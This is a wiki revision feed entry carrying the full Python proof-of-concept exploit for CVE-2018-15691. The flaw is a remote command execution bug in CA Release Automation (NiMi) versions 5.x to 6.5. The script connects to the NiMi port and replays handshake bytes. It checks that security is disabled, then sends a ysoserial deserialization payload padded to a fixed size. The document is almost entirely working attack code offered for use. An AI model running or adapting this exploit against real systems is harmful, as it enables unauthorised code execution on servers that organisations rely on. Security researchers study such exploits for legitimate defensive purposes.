https://pwnwiki.com/index.php?action=history&feed=atom&title=CA_Release_Automation_NiMi_6.5_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E 2026-04-07T06:05:33Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CA_Release_Automation_NiMi_6.5_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1511&oldid=prev 2021-04-11T01:24:59Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: CA Release Automation NiMi 6.5 - Remote Command Execution # Date: 2016-06-23 # Exploit Authors: Jakub Palaczynski, Maciej Grabiec # Vendor Homep...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: CA Release Automation NiMi 6.5 - Remote Command Execution<br /> # Date: 2016-06-23<br /> # Exploit Authors: Jakub Palaczynski, Maciej Grabiec<br /> # Vendor Homepage: http://www.ca.com/<br /> # Software Link: https://docops.ca.com/ca-release-automation/5-5-2/en/installation/deploy-agents/<br /> # Version: CA Release Automation (NiMi) 5.X, 6.3, 6.4, 6.5<br /> # CVE: CVE-2018-15691<br /> # Info: CA Release Automation (NiMi) Remote Command Execution via Deserialization<br /> # Info: Payloads generated using CommonsCollections1 from ysoserial work correctly.<br /> # Info: Proof of Concept exploits NiMi service if security is turned off.<br /> <br /> #!/usr/bin/python<br /> <br /> import socket<br /> import sys<br /> import struct<br /> <br /> if len(sys.argv) &lt; 4:<br /> sys.stderr.write(&quot;[-]Usage: python %s &lt;ip&gt; &lt;port&gt; &lt;payload_file&gt; &lt;target_nodeid - not mandatory&gt;\n&quot; % sys.argv[0])<br /> sys.stderr.write(&quot;[-]Exemple: python %s 10.0.0.1 6600 /tmp/payload.bin\n&quot; % sys.argv[0])<br /> exit(1)<br /> <br /> host = sys.argv[1]<br /> port = sys.argv[2]<br /> file = sys.argv[3]<br /> <br /> # check if payload does not exceed specified value<br /> payloadObj = open(file,'rb').read()<br /> if len(payloadObj) &gt; 5729:<br /> print 'Payload must be less than 5730 bytes. Try another one.'<br /> exit(1)<br /> <br /> # open socket to nimi port<br /> sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> print 'Connecting to node.'<br /> sock.connect((host, int(port)))<br /> <br /> # say hello to nimi<br /> sock.recv(256)<br /> sock.send('\x00\x00\x00\x0c\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x72\x02\x08\x00') # first required message<br /> <br /> # get Node ID<br /> data = sock.recv(256)<br /> name = data[5] + data[6:6+ord(data[5])]<br /> if len(sys.argv) == 5:<br /> name = struct.pack(&quot;&gt;B&quot;, len(sys.argv[4])) + sys.argv[4]<br /> <br /> # check if security is enabled<br /> sock.send('\x00\x00\x00\x1a\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x7a\x10\x0a\x0c\x0a\x07\x30\x2e\x30\x2e\x30\x2e\x30\x10\x94\x3c\x10\x00') # second required message<br /> check = sock.recv(256)<br /> if check == &quot;&quot;:<br /> print 'Security is enabled. Sorry.'<br /> exit(1)<br /> <br /> # send payload<br /> print 'Sending payload.'<br /> header = '\x0a\x04\x6e\x6f\x64\x65\x10\x01\x1a' + name + '\x2a\xe4\x2c\x0a\xe1\x2c'<br /> stage = header + payloadObj + '\x90' * (5729-len(payloadObj))<br /> payload = struct.pack(&quot;&gt;I&quot;, len(stage)) + stage<br /> <br /> sock.sendall(payload)<br /> sock.close()<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki